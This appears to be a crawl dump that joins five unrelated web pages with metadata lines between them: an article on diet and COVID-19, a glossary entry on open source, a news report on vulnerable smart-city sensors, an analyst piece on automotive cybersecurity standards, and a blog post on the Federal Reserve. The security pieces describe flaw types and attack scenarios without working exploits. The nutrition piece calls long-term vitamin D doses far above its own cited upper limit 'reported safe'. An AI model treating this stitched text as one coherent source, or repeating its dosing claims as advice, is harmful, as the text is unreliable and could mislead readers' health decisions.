The study findings were published in the peer-reviewed journal Diseases.
Severe acute respiratory syndrome coronavirus-2 (SARS-CoV-2), also known as COVID-19, is a contagious disease that started its spread in Wuhan, China, in 2019. The World Health Organisation (WHO) has classified the rapidly evolving disease as a global pandemic.
Since then, it has caused unprecedented strain on healthcare systems, with overwhelming mortalities and severities globally. The disease presents itself in a vast range of symptoms, most noticeably coughs, fevers, fatigue, and shortness of breath, or in critical cases with severe complications such as respiratory failure or multiple organ dysfunction syndromes, often resulting in death.
Evidence suggests that the morbidity of COVID-19 is associated with increased levels of inflammatory mediators such as cytokines and chemokines, with interferon-γ, interleukin-1, interleukin-6, TNF, and interleukin-18 considered as key cytokines that possess central immunopathologic functions [4,5].
These complications are largely associated with the onset of aggressive inflammatory responses that trigger the release of proinflammatory cytokines, propelled by a series of complex, interconnected networks of signalling pathways and cell types. This series of reactions is known as a “cytokine storm”.
The severity of COVID-19 symptoms, as with the previous, similar coronaviruses SARS and MERS, is associated with this hyperactive immune response, with increased levels of cytokines and chemokines. In COVID-19, a delayed release of cytokines and chemokines followed by the rapid release of proinflammatory cytokines led to T-cell apoptosis and delayed viral clearance.
The surge of cytokines as the disease progresses causes lung injury as neutrophils and monocytes infiltrate and destroy the alveolar cellular barriers. The coronavirus has also exhibited thromboembolic effects in patients, especially in those with high blood pressure, causing damage to blood vessels.
Though the availability of COVID-19 vaccines has demonstrated efficiency in reducing COVID-19-associated mortalities and morbidities, the long-term effectiveness is still under clinical trial [11,12].
The link between diet and the immune system is widely recognised, which is why its involvement in COVID-19 is receiving so much attention. A sufficient nutritional condition is necessary for the immune system to operate properly. This is strongly supported by data relating dietary deficits to immune system functioning.
Poor diet leads to weakened immune defences, which is usually related to lowered immunity and increased susceptibility to illness. In this respect, while there does not appear to be a treatment for COVID-19, healthy eating habits tend to improve immune system function and lead to a lower likelihood of COVID-19 infection and better recovery in those who have been infected.
This is especially essential given the healthcare overload caused by the epidemic, emphasising the importance of nutrition in the population’s overall health and immunological response.
Nutritional influence on reducing inflammation has been well documented and is practiced whenever possible to reduce viral infection risks. This includes the promotion of a proper long-term diet and healthy lifestyle habits.
An anti-inflammatory diet that lessens the effects of inflammatory mediators could therefore be adopted to influence or mitigate COVID-19 outcomes.
Until the spread of SARS-CoV-2 can be stopped and its lasting effects understood, the focus on nutritional interventions as a treatment strategy against its inflammatory properties holds great potential. Indeed, nutrition plays a crucial role in the immune system, and its effects have been largely recognized, with studies showing that COVID-19 patients with inadequate micronutrient levels had longer periods of hospitalisation [33,34].
Similarly, a vast majority of hospitalised COVID-19 patients showed a general trend of at least one nutrient deficiency. Micronutrients such as vitamins C and D have long been considered to contribute to innate immune functions. By highlighting these aspects, coupled with their safety and ease of application, they may prove useful in influencing systemic markers of immune function.
Therefore, methods that could increase the chances of early prevention and treatment should be thoroughly explored.
The Mediterranean diet is well known for its demonstrated ability in preventing cardiovascular diseases and type 2 diabetes mellitus and has been inversely related to respiratory diseases and inflammation [36,37]. The diet emphasises fruits and vegetables, legumes, olive oil intake, fish intake, and reduced meat consumption.
A well-balanced diet rich in these foods supplies anti-inflammatory and immunomodulatory substances, such as essential vitamins and minerals [38,39]. Adherence to the diet has also been shown to decrease PAF-induced platelet aggregation.
The diet is a significant source of bioactive polyphenols, which possess antioxidant, anti-inflammatory, and anti-thrombotic characteristics and demonstrate health-promoting benefits, particularly against cardiovascular diseases. In a large ecological study, adherence to a Mediterranean diet was negatively associated with COVID-19 infections and morbidity.
Furthermore, following the diet has been noted to reduce length of stay and mortality in hospitalised patients over the age of 65 [43,44]. The Mediterranean diet, with its positive health benefits and properties, has been recommended by researchers as a viable strategy for improving mortality and addressing both short-term and long-term conditions associated with COVID-19 infection and severity [21,25].
However, the complexity of investigating the link between dietary lifestyles and disease is well established. A study is currently underway to evaluate the effects of dietary habits on COVID-19 infection outcomes, specifically a Mediterranean diet versus a typical high-fat, high-sugar Western diet (NCT04447144).
Until then, more research is required to determine if the Mediterranean diet decreases the risk of COVID-19 and whether the chronic disease risk reduction linked with the Mediterranean diet reduces COVID-19 mortality.
A nutrient that has been put under the spotlight is vitamin D, with its sales showing significant global growth in 2020. When consumed, vitamin D exhibits many health benefits, including immune-enhancing effects and prevention of respiratory infections, as well as antiviral and anti-inflammatory effects that theoretically would be well suited to the battle against COVID-19 [47,48,49].
Vitamin D minimises the production of proinflammatory T-helper 1 cells, resulting in decreased production of proinflammatory markers. In a meta-analysis, data from two RCTs and one case-control study showed that patients given vitamin D supplementation required less ICU care, indicating a potential role for vitamin D in decreasing COVID-19 severity.
Likewise, vitamin D has shown the capability to moderate long-term immunological effects generally associated with COVID-19 infection, such as persistent IL-6 elevation and a prolonged interferon-gamma response. COVID-19 patients have also been found to be more likely to have vitamin D deficiencies, with mortality shown to be higher in patients with vitamin D deficiency than in those without [53,54].
However, the results should be interpreted carefully due to large variances in sample size, dosage, and other limiting factors, as well as uncertainty over whether low vitamin D is a cause or a consequence of COVID-19. Studies have also shown that the potential therapeutic effects of vitamin D likely depend on a patient’s prior vitamin D status.
Further research is required before any determination can be made regarding the therapeutic effects of vitamin D against COVID-19. For the general public, it is therefore in their best interest to ensure adequate vitamin D intake to prevent deficiency. The recommended dietary allowance of vitamin D is 600–800 IU/day, with many researchers recommending much higher dosages of 5,000 to 10,000 IU/day for long periods. Though the tolerable upper intake level for vitamin D is 4,000 IU/day, long-term supplementation of 5,000 to 50,000 IU/day has been reported to be safe.
Vitamin C is a classical antioxidant that has long been associated with various immune-modulating effects, acting as a cofactor in a number of biosynthetic pathways and being involved in antibody production. Vitamin C accumulates in leukocytes and is rapidly consumed when an infection is present. Dietary vitamin C intake is associated with decreased inflammatory markers such as IL-6, TNF-α, and C-reactive protein, as well as with decreased markers of thrombosis in high-risk patients.
Clinical studies show increased production of the anti-inflammatory cytokine IL-10 by blood mononuclear cells with a daily intake of 1 g of vitamin C. IL-10 works through a feedback mechanism to inhibit and control cytokine secretion, which is critical in modulating inflammation in COVID-19.
A meta-analysis showed that high-dose intravenous vitamin C infusions can shorten the length of ICU stay and significantly reduce the mortality rate.
Vitamin C may also prove beneficial against COVID-19 symptom progression from mild to severe, with vitamin C supplementation leading to decreased inflammatory markers as well as reduced mortality [60,61,62]. A trial involving 200 COVID-19 patients in a phase 2 interventional study of vitamin C supplements is currently underway (NCT04395768).
The vitamin shows promising immunomodulatory effects; however, additional understanding of the biochemical interaction of vitamin C with the COVID-19 virus is required. The recommended daily allowance of vitamin C for adults is 90 mg/day. While short-term use of vitamin C is safe, a consistently high dose may not significantly benefit healthy individuals and could cause adverse effects such as an increased risk of oxalate kidney stones.
Fish oil, or more specifically omega-3 polyunsaturated fatty acids (PUFAs), is well known for various health benefits, such as improved cardiovascular function and improved platelet effects [65,66]. Omega-3 PUFAs have also shown anti-inflammatory characteristics, demonstrating a reduction in C-reactive protein through dietary intake.
Most notably, omega-3 PUFAs such as eicosapentaenoic acid (EPA) and docosahexaenoic acid (DHA) exhibit immense anti-inflammatory potential through inhibition of proinflammatory cytokine synthesis and the production of less inflammatory and pro-resolving lipid mediators such as prostaglandins, thromboxanes, protectins, and resolvins [30,67].
Omega-3 fatty acids have also been shown to reduce the synthesis of thromboxane and PAF (platelet-activating factor). The same PUFAs have also been studied for their potential to inactivate enveloped viruses through disruption of membrane integrity.
As SARS-CoV-2 uses angiotensin-converting enzyme 2 (ACE2) as its entry receptor, which is described as being present in lipid rafts, omega-3 PUFAs could plausibly regulate and disrupt the protein complex and lipid raft fluidity.
Furthermore, according to a Cochrane review and a meta-analysis, patients with acute respiratory distress syndrome who received an omega-3 fatty acid-enriched diet or supplements exhibited a significant reduction in the length of ICU stays, an increase in blood oxygenation, and a reduction in ventilation demand and organ failure [71,72].
With its anti-inflammatory and possible antiviral effects, coupled with the reduced hospitalisation seen in studies, the intake of omega-3 PUFAs may prove beneficial as a pharmaconutrient for reducing the impact of inflammation caused by COVID-19. Recent studies have also shown beneficial effects of omega-3 supplements [73,74], and their use has been proposed by others with great interest [67,70].
Furthermore, a study is currently underway (NCT04335032) with the aim of studying the effects of EPA capsules on patients with confirmed SARS-CoV-2 infection. However, despite its common portrayal as harmful, the inflammatory response is still essential to our immune system.
At high omega-3 PUFA levels, DHA and EPA may impair host resistance and show potential negative cardiovascular effects. This could prove counterproductive by increasing oxidative stress due to cellular membrane damage. Though many studies have demonstrated positive outcomes in terms of anti-inflammatory effects on disease, more verification through clinical trials is needed, and any supplementation must be undertaken with care.
Zinc is critical to the development of immune cells, with its deficiency causing changes in cytokine production and proinflammatory responses through monocytes, thereby increasing oxidative stress in zinc-deficient patients [77,78]. Zinc deficiency also results in decreased function of T-helper and cytotoxic T cells.
Similarly, dietary zinc supplementation has been shown to significantly reduce the incidence of acute lower respiratory infections, as well as to shorten recovery times in children with respiratory diseases [80,81]. For its antiviral and anti-inflammatory properties, zinc has been claimed to play an immunomodulatory role against COVID-19 infection.
In an uncontrolled case series, the initiation of high-dose zinc supplements resulted in clinical symptomatic improvement in four patients. Despite this, many studies regarding the effectiveness of zinc against diseases or infections have been inconclusive or inconsistent, with inadequate sample sizes or doses. The adverse effects of high zinc dosage should also be considered, especially for those infected.
According to current studies, supplementation with several micronutrients may be beneficial in both the prevention and management of COVID-19 infection. Particular emphasis should be directed to vitamin C and vitamin D, as they play a key role in immune response control, with the goal of minimising infection risk while also enhancing the health of COVID-19 patients.
Vitamin C has been shown to aid in the prevention and treatment of viral infections via a variety of primarily indirect processes, while vitamin D has been shown to have direct antiviral capabilities. Diets such as the Mediterranean diet, characterised by its high intakes of grain, fruit, and vegetables, and moderate intake of fish and dairy, are advised for adequate intake of micronutrients and bioactive compounds. Even if certain dietary supplements or therapies are thought to be beneficial for the prevention and recovery of COVID-19 patients, strong data from randomised clinical studies are still needed to back up these claims.
The long-term observation of COVID-19 patient recovery should also be established to study the severe and non-severe patient nutrition. | <urn:uuid:d4db72e0-a47c-4a1c-baa3-be3e8b5e6070> | CC-MAIN-2022-40 | https://debuglies.com/2021/11/04/anti-inflammatory-diets-comprising-of-mediterranean-cuisine-vitamins-c-d-omega-3-fatty-acids-and-zinc-helps-in-covid-19-specially-in-terms-of-preventing-disease-severity/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335124.77/warc/CC-MAIN-20220928051515-20220928081515-00741.warc.gz | en | 0.941619 | 3,301 | 3.515625 | 4 |
Open source refers to any software program whose source code is available to the public to use, share, and modify however they want. This could mean fixing bugs, improving the software, or adapting it to meet specific needs. Open source technology opens the door for collaboration and the emergence of new models of software.
A program can only be labeled ‘open source’ if it meets the standards set by ‘The Open Source Definition’, which determines whether a software license can carry the open-source certification mark. This document was created by the ‘Open Source Initiative’ (OSI), the non-profit organization that stewards the definition and reviews licenses for compliance with it.
With regards to artificial intelligence (AI), AI systems for problem solving, including Cognitive Computing systems, require a base collection of knowledge or corpus. Open source projects like WordNet, which catalogs words, synsets, and senses in English, can give application developers a jumpstart on building robust solutions with natural language capabilities. The same rings true for machine learning (ML), where the majority of ML libraries are available from the open source community (largely via The Apache Software Foundation). | <urn:uuid:626f3141-ad50-4241-9da6-3301d8e608dc> | CC-MAIN-2022-40 | https://aragonresearch.com/glossary-open-source/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00741.warc.gz | en | 0.903826 | 234 | 3.453125 | 3 |
Earlier this year, many residents in Hawaii were thrown into a temporary state of panic following an emergency alert on their mobile devices warning about an incoming ballistic missile.
The warning turned out to be the result of human error. But new research from IBM X-Force Red and Threatcare shows it would take little in the future for cyberattackers to deliberately cause widespread panic by triggering false alerts about catastrophic events, such as floods and radiation exposure.
Security researchers from the two firms recently tested multiple so-called smart city products deployed in a growing number of cities for uses like traffic management, monitoring air quality, and disaster detection and response.
In this case, the tested systems fell into three broad categories: industrial IoT, intelligent transportation systems, and disaster management devices. The products included those used for warning planners about water levels in dams, radiation levels near nuclear plants, and traffic conditions on highways.
The exercise unearthed 17 zero-day vulnerabilities, eight of them critical, in four smart city products from three vendors — Libelium, Echelon, and Battelle. Using common search engines like Shodan and Censys, the IBM and Threatcare researchers were able to discover between dozens and hundreds of these vulnerable devices exposed to Internet access.
With relatively little effort, they were also able to determine, in many cases, the entities using the devices and the purposes for which they were using them. For instance, they identified an entity in Europe using smart devices to monitor radiation levels and a major US city using smart sensors to track traffic conditions. The research found the vulnerable devices deployed across major US and European cities and in other regions of the world.
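To see what that discovery surface looks like from the defender's side, the sketch below asks Shodan what it has indexed about one of your own public IP addresses. The shodan Python package, the placeholder API key, and the address are assumptions for illustration only; none of them come from the IBM/Threatcare research.

    import shodan  # pip install shodan (assumed available)

    API_KEY = "YOUR_SHODAN_API_KEY"   # hypothetical placeholder
    OWN_PUBLIC_IP = "203.0.113.10"    # hypothetical address you are auditing

    api = shodan.Shodan(API_KEY)
    try:
        # Ask Shodan what it has already indexed about one of your own public IPs
        host = api.host(OWN_PUBLIC_IP)
        print("Open ports indexed by Shodan:", host.get("ports", []))
        for service in host.get("data", []):
            banner = service.get("product") or "unknown service"
            print(f"  port {service.get('port')}: {banner}")
    except shodan.APIError as err:
        # No information available, or the key/quota is invalid
        print("Shodan lookup failed:", err)

Auditing your own address space this way surfaces the same exposure an attacker would see, without probing the devices themselves.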
All three vendors have since patched the vulnerabilities or issued software updates, and so have the entities that were identified as using the vulnerable products.
In a report this week, Daniel Crowley, research director of IBM's X-Force Red, described the results as "disturbing."
"According to our logical deductions, if someone, supervillain or not, were to abuse vulnerabilities like the ones we documented in smart city systems, the effects could range from inconvenient to catastrophic," he said.
The researchers, for instance, found that an attacker could use vulnerabilities of the sort identified in their report to manipulate water sensors so that they report flooding in an area when there is none. More dangerously, the attacker could also manipulate the sensors to silence warnings of an actual flood caused by natural or human factors.
Similarly, the researchers found that attackers could exploit the vulnerabilities to trigger a false radiation alarm in areas surrounding a nuclear plant. "The resulting panic among civilians would be heightened due to the relatively invisible nature of radiation and the difficulty in confirming danger," Crowley said.
Another scenario that presented itself during the research was of attackers manipulating remote traffic light sensors, causing traffic gridlock on a massive scale.
Troublingly, most of the vulnerabilities that IBM and Threatcare unearthed were of the easily discoverable kind, meaning the researchers had to put little effort into finding them. "While we were prepared to dig deep to find vulnerabilities, our initial testing yielded some of the most common security issues," Crowley said.
Examples included default passwords, hardcoded admin accounts, SQL injection errors, flaws that allowed authentication bypass, and plaintext passwords. The research showed that many smart cities are already exposed to threats that are well-understood and should have long ago been mitigated, he said.
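Most of those flaw classes have well-understood fixes. As one hedged illustration, the SQL injection errors mentioned above are typically eliminated by binding parameters instead of concatenating user input into the query text; the table and column names below are invented for the example, not taken from the affected products.

    import sqlite3

    def find_operator(conn: sqlite3.Connection, username: str):
        cur = conn.cursor()
        # Vulnerable pattern: attacker-controlled input pasted into the SQL text
        #   cur.execute("SELECT * FROM operators WHERE name = '" + username + "'")
        # Safe pattern: the driver binds the value, so input is never parsed as SQL
        cur.execute("SELECT id, name, role FROM operators WHERE name = ?", (username,))
        return cur.fetchall()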
The results of the IBM and Threatcare study are another confirmation of the security issues posed by the growing adoption of smart city technologies worldwide. Organizations such as Gartner have predicted that over the next few years, cities will connect many billions of devices to the Internet for a wide range of use cases, greatly expanding the attack surface in the process.
A global survey of smart city security issues by ISACA earlier this year showed many are especially concerned about attacks targeting energy and communication sectors. Sixty-seven percent said they believe that nation-state actors present the biggest threat to smart-city infrastructure, and only 15% consider cities to be well-equipped to deal with the threat. The survey also showed that a majority (55%) thought the national government is best-equipped to deal with smart city cybersecurity threats. | <urn:uuid:4a133065-f7eb-4aef-8127-8cc4faefa513> | CC-MAIN-2022-40 | https://www.darkreading.com/vulnerabilities-threats/vulnerable-smart-city-devices-can-be-exploited-to-cause-panic-chaos | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00741.warc.gz | en | 0.961732 | 872 | 2.875 | 3 |
Recent advances in the manufacturing of autonomous vehicles, connected vehicles and electric vehicles (EVs) have made vehicle architecture more complex. The increasingly sophisticated integration of software in vehicles is creating an opening for cyber attackers to cause malfunctions. For example, the recent Jeep hack was executed in a controlled environment in which the integration of software made the vehicle vulnerable to cyberattacks. Similarly, a disgruntled employee in an automotive manufacturing company in Texas remotely disabled hundreds of cars by disrupting the functioning of a connected vehicle platform. Since digital capabilities are critical to connected cars, cyber criminals are even interfering with the working of car door locks, headlights, sunroofs and other components. A recent attack was executed through the Wi-Fi system of a vehicle, allowing the attacker to control lights, disable alarms and unlock doors. Another area that is vulnerable to attacks is the passenger car unit (PCU), which can be exploited for identity theft through a data center compromise.
A focus on cybersecurity is increasingly critical to ensure the necessary measures are in place to prevent attacks throughout the lifecycle of a vehicle. This means securing the production process beyond the development lifecycle. Project-specific cybersecurity management should begin with a cybersecurity assessment to determine if security requirements are implemented at the vehicle level or a component level.
Next-generation automotive manufacturers tend to integrate a number of third-party solutions, often from niche technology vendors or start-ups. These solutions often align with four pillars of mobility: autonomous, connected, electric and shared. These are sometimes referred to as ACES. Standards such as ISO 21434 neutralize cybersecurity vulnerabilities associated with these external components under the parameters for distributed cybersecurity activities. These parameters apply to the supplier/vendor capabilities, which leads to a more streamlined process for selecting solutions and aligning responsibilities for the overall vehicle security.
Overview of the standards
ISO 21434 and WP.29 are the standards used to secure connected vehicles. The draft version of ISO 21434 was launched in February 2020, and the final version is expected in Q3 2021. ISO 21434 defines standards for new vehicle types launched by OEMs from Q3 2022 and for any new vehicle from Q3 2024. The WP.29 is primarily enforced in Europe; the draft, which was released in June 2020, specifies requirements for all connected vehicles around mitigating cybersecurity risks from the beginning to the end of the lifecycle of any auto model. The two industry standards overlap significantly in their mandates to monitor, detect and respond to cyber threats, each providing relevant data to support the analysis of an attempted or a successful cyberattack. The data supports an audit mechanism or a login mechanism, enabling a cybersecurity analyst to investigate and understand the methodology related to a particular incident.
Under these new guidelines, organizations in the automotive and transportation ecosystems would need to create a cybersecurity management system (CSMS), defining policies and procedures. The CSMS details, along with all evidence and auditable references, would need to be produced during the approval of a vehicle type. The guidelines ensure that procedures are in place for an identified risk and are not limited to a particular vehicle type. This is followed by testing the cybersecurity infrastructure for a vehicle type, which includes penetration testing, fuzzing and security assessment across the ECU level, PCU level, infotainment level, communication level, and the vehicle in general.
It is necessary to plan proper test cases and to continuously assess the durability of the protection. Given the evolving nature and increasing sophistication of cyberattacks, the built-in security controls of a present-day vehicle may not remain adequate.
An organization needs to have a strategy to monitor the common vulnerabilities and exposures (CVE) database and stay updated on the evolving cyber threat landscape. It also needs to undertake a thorough analysis to identify if a vehicle might be vulnerable to new types of cyberattacks and find ways of mitigating the threats. Mitigation activities, such as creating relevant patches and upgrading patches, should be streamlined to adhere to the regulations.
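As a rough sketch of what such monitoring can look like, the snippet below polls NIST's public NVD REST API for CVEs matching a keyword. The keyword, the use of the requests library, and the result handling are assumptions, and the endpoint and parameter names should be checked against the current NVD documentation before being relied on.

    import requests  # assumed available

    NVD_URL = "https://services.nvd.nist.gov/rest/json/cves/2.0"

    def recent_cves(keyword: str, limit: int = 5):
        # keywordSearch filters CVE descriptions; resultsPerPage caps the response size
        params = {"keywordSearch": keyword, "resultsPerPage": limit}
        resp = requests.get(NVD_URL, params=params, timeout=30)
        resp.raise_for_status()
        for item in resp.json().get("vulnerabilities", []):
            cve = item.get("cve", {})
            summary = cve.get("descriptions", [{}])[0].get("value", "")
            print(cve.get("id"), "-", summary[:80])

    recent_cves("telematics control unit")  # hypothetical search term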
Adherence to regulations by OEMs and suppliers to prevent cyberattacks
As stated earlier, the guidelines – as defined under ISO 21434 and WP.29 – overlap, compelling OEMs and Tier 1 suppliers to reexamine their cybersecurity strategies to span development and postproduction phases. ISO 21434 does not address security on a component or project level alone; it addresses cybersecurity as a part of an organization’s culture.
Managing project-specific cybersecurity (security for a specific vehicle type) should include design, development, testing, production and post-production phases. The regulations also encompass risk assessment. A focus on cybersecurity at the concept or design levels helps the product engineering phase address threat mitigation. Also, the regulations make sure the responsibility of cybersecurity is shared by suppliers as well. As a result, OEMs need to ensure the components sourced from a supplier are compliant with ISO 21434 and are in keeping with the overall security management of a complete vehicle.
The WP.29, on the other hand, encompasses four major areas: 1) managing vehicle cyber risks, 2) detecting and responding to a post-production security incident, 3) mitigating risks along the value chain by adopting secure-by-design concept (engaging suppliers), and 4) providing safe and secure over-the-air (OTA) updates. The four areas need to be addressed along two lines: first, by defining policies and procedures for organizations to follow with a CSMS; and second, by undertaking assessment and categorization of a risk once it is identified. At the project level, adherence to WP.29 needs to be specified for a manufacturer across areas such as risk assessment at a component level, and then scaled up.
Cybersecurity in product engineering, manufacturing engineering and post-production activities
ISO 21434 is gradually becoming integral to the V-cycle of vehicle development ― relevant from the vehicle conceptualization phase, throughout the validation phase, to adherence to cybersecurity concepts and requirements. ISO 21434 defines cybersecurity goals across the vehicle production lifecycle ― concept design, architecture design, hardware and software architecture definition and design requirement ― simultaneously validating each and every step. Finally, the process is concluded with thorough penetration testing, fuzzing and vulnerability assessment.
The WP.29 guideline spans the post-development phases as well ― the cyber defense mechanism for a vehicle after launch must be addressed during the development and planning phase. Such measures would cover loopholes such as compromised keys, vulnerabilities in operations and maintenance processes, and sophisticated threats. WP.29 focuses on a number of distributed activities, including how an enterprise evaluates supplier capabilities, aligns responsibilities and adheres to guidelines. Once a component is delivered, the OEM receives guidance on how the supplier audited, tested and standardized the component. Furthermore, the standard also addresses how to decommission a particular vehicle or component.
Mandating a detailed and secure OTA/SOTA mechanism
The WP.29 mandates a detailed process for software updates, particularly an OTA upgrade, that every OEM must follow with the help of a software update management system (SUMS) for vehicles on the road. The SUMS must be secured, thoroughly tested and managed to prevent breaches or attacks. Also, the delivery mechanism of an OTA upgrade package has to be secure, with the OEM ensuring the integrity and authenticity of the package being sent. As the OTA package is encrypted, signed and encoded prior to sending it to a vehicle or component, it assures an additional layer of security. Then the package is decoded, the signature validated, the file decrypted, and finally the decrypted file handed over to the update manager. The software identification number has to be protected and a mechanism for reading that from the data should be put in place by the OEM.
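A minimal sketch of that receive-side sequence (verify the signature over the still-encrypted package, then decrypt it) could look like the following, using Python's cryptography library. The choice of Ed25519 signatures and AES-GCM encryption, and all key material, are illustrative assumptions rather than anything mandated by WP.29 or ISO 21434.

    from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PublicKey
    from cryptography.hazmat.primitives.ciphers.aead import AESGCM

    def verify_and_decrypt(package: bytes, signature: bytes,
                           signer_public_key: bytes, session_key: bytes,
                           nonce: bytes) -> bytes:
        # 1. Validate the OEM's signature over the (still encrypted) package;
        #    raises cryptography.exceptions.InvalidSignature if it was tampered with.
        Ed25519PublicKey.from_public_bytes(signer_public_key).verify(signature, package)
        # 2. Only then decrypt; AES-GCM additionally authenticates the ciphertext.
        return AESGCM(session_key).decrypt(nonce, package, None)

If either check fails, the update manager never receives a decrypted image, which is the property the standard is after.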
WP.29 has adopted a structured methodology around CSMS OTA and has mandated that vehicle manufacturers follow five parameters:
- Identify and mitigate supplier-related risks through a cybersecurity risk assessment and mitigation framework
- Possess detailed risk assessment and mitigation strategy with demonstrable test results
- Produce design and the corresponding design process for a particular vehicle type
- Maintain data forensic capabilities across post-production activities that showcase the way a vehicle is monitored, vulnerabilities are detected, and protection is ensured against cyberattacks
- Formulate measures to detect and respond to a specific cyberattack associated with a particular vehicle, the backend system or the complete ecosystem.
The WP.29 looks at a few other areas as well, such as managing software updates, informing a user about an update or the availability of the update, ensuring the availability of sufficient power to complete the update and the capability of a vehicle to conduct the update. It also covers how to safely execute an update, including a rollback mechanism if an update fails.
Overlap between standards and the role of system integrators
A number of systems integrators such as LTTS have created frameworks to draw similarities between WP.29 and ISO 21434 to help OEMs and Tier 1 suppliers adhere to the standards. For example, LTTS has identified eight areas of WP.29 that can be mapped to various processes and clauses of ISO 21434 ― covering everything from organization-wide cybersecurity to a security as it relates to a particular vehicle type. It encompasses the processes for monitoring, detecting and responding to cyberthreats and the processes needed to capture relevant data to support the analysis of security breaches.
Systems integrators first tend to analyze the threat landscape for a vehicle model or the specific component they are going to develop for a client. A thorough threat assessment and risk analysis should help create a mitigation strategy, architecture and high- and low-level design (HLD and LLD). For cases in which the component development is already in progress and security is not included in the scope, systems integrators carry out a gap analysis after performing threat assessment and risk analysis (TARA). This is followed by the definition phase, in which the framework and processes are defined, engineers are trained, and the process is piloted and refined to adhere to organizational requirements. Finally, the processes are implemented as a part of product engineering.
Most of the global systems integrators have been working with automotive OEMs and Tier 1s for decades and can be expected to streamline the roll out of the process with the required training. A rich experience in engineering and R&D services is required to measure the process and analyze potential threats and provide implementation and validation support for cybersecurity. This involves laying out various sub-processes for a component or a vehicle type, such as TARA, HLD, LLD, architecture design, product process, post-production strategy and supplier and product validation strategy.
The biggest existing challenge when it comes to cybersecurity in connected mobility is the lack of awareness about the nuances of the ISO 21434 and WP.29 standards. A number of important market participants across the global automotive value chain are not aware of the regulatory standards or the possibilities for ensuring adherence among their suppliers. This creates a whitespace of opportunities for systems integrators and consulting companies that can step in to ensure this adherence and enable enterprises to define their cybersecurity policies and validate them. The value proposition would be simplified and comprehensive cybersecurity plans for OEMs.
ISG notes that several Tier 1 suppliers are confused by the actions of OEMs tightening their policies regarding compliance to ISO 21434 and WP.29. For instance, vehicle infrastructure components such as wireless chargers, if hacked, can compromise multiple critical components. This is compelling OEMs to ensure these components comply with the security guidelines under the relevant standards.
Threat assessment and risk analysis is another area of heightened significance. Suppliers need the capability to design complete security systems – including defining a cybersecurity plan, TARA, component-specific security and cybersecurity specifications – so they can offer vulnerability assessments that span software/hardware and system level architecture design and the overarching product engineering. Providers have an opportunity to grow their cybersecurity plans to cover security verification and validation, production and control, and post-production.
A number of next-generation automotive cybersecurity technology suppliers have emerged around the world, providing agentless, cloud-based solutions with proprietary data analytics platforms. These companies, such as Israel-based Upstream, also are exploring possibilities with other enterprise segments such as insurance. With the availability of fleet, telematics and consumer data, these companies can engage analytics engines to pinpoint the most appropriate automobile insurance policies for the end-user.
As a part of the upcoming study, Manufacturing Industry Services 2021, ISG Provider Lens analyzes this space from a product perspective. The study analyzes product and solution vendors from across the mobility security market on their ability to provide threat analysis to enterprises and components such as advanced driver-assistance systems (ADAS), ECUs and EV battery systems to OEMs and Tier 1 suppliers.
About the author
Avimanyu is a Lead Analyst (Research) in ISG India operations, bringing over 10 years of experience in market research and consulting. At ISG, Avi’s focus is on the disruptive technologies and innovations pertaining to enterprise networks and engineering and R&D practices. | <urn:uuid:12a0816a-c0a6-4fd3-a86c-98530634c383> | CC-MAIN-2022-40 | https://isg-one.com/articles/cybersecurity-concerns-in-connected-mobility-a-panacea-for-the-recovering-automotive-industry | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00741.warc.gz | en | 0.936922 | 2,660 | 2.578125 | 3 |
Central banks hold the reins of monetary policy and regulate national financial systems. In the United States, central banking in its modern form dates back to the advent of the Federal Reserve System, which today serves as one of the most elaborate frameworks of checks and balances for maintaining equilibrium and financial stability among central banks.
This blog explores the structure of the Federal Reserve, establishes its role and then explores the various ways in which the Federal Reserve fulfils its duty towards the stability of the United States economy and essentially, the world economy.
Structure of the Federal Reserve
The establishment of the system dates back to the Federal Reserve Act, which President Woodrow Wilson signed into law on December 23, 1913. The Act wrote into law a system aimed at diffusing power between regulators and government through three components: the Board of Governors, the twelve regional Federal Reserve Banks, and the Federal Open Market Committee (FOMC).
The President of the United States nominates the members of the Board of Governors, and they are confirmed by the US Senate. The FOMC is in charge of setting national monetary policy. Its decisions affect the cost and availability of credit for borrowers and the returns received by savers. It directs open market operations and sets the policy interest rate, the federal funds rate.
(Suggested blog: What is SEBI? Structure & Functions)
Role of the Federal Reserve
The Federal Reserve is accountable to the U.S. Congress and the public and to ensure financial accountability, the financial statements and annual reports of the Federal Reserve Banks and the Board of Governors are audited annually by an independent, outside auditor.
Though a case can be made for both sides: for and against the independence of the Federal Reserve, the elaborate framework along with an independent revenue stream ensures both the instrumental and goal independence of the Fed.
In essence, the goal of the Federal Reserve is to manage monetary policy maintaining a state of financial stability in the economy by ensuring stable prices, minimum unemployment level and moderate interest level in the economy.
All of these goals entail maintaining a sense of confidence in the economy and its constituents by providing sufficient liquidity while ensuring the solvency of the financial system through regulation of the banks guiding a sufficient capital level.
Although employment and inflation form the dual mandate of most central banks - the goals of some Central Banks may differ according to the respective macroeconomic issues faced by the nations.
(Also read: Microeconomics vs macroeconomics)
Federal Reserve’s Working Approach
Now that the role of the Federal Reserve is established, this section explores the various tools used by the Federal Reserve in fulfilling its responsibility towards the United States and the whole world.
The quintessential weapon for getting a handle on all these seemingly unlinked variables is the federal funds rate (the rate at which banks lend to one another), which guides the prime rate and, in turn, passes through the entire structure of interest rates built one over the other. The funds rate is set based upon the Fed's outlook on inflation and unemployment in the economy.
In case of a slowdown in economic activity, the Fed can reduce the interest rate guidance which shall, in turn, be taken up (and usually is) by the leading banks who will then adjust their inter-bank lending rates downwards.
In effect, this shall reduce the cost of funds for the banking system leading to a reduction in lending rates to corporate and retail customers, while at the same time reducing the interest rate on deposits in order to match the reduction in the prime rate. Overall, this implies that people shall get a lower interest on their deposits and will get cheaper loans at the same time.
For individuals, this leads to an increase in spending and eventual flow of money parked in term banking products to the financial markets as they become a more lucrative option for gaining returns.
(Must catch: What are RBI bonds and their features?)
For corporates, this leads to a spur in growth on the back of a lower cost of credit.
Both these actions on the part of people and corporations lead to a rise in economic activity, creating jobs and spurring back the engine of the growth, heralding the economy into an expansionary phase.
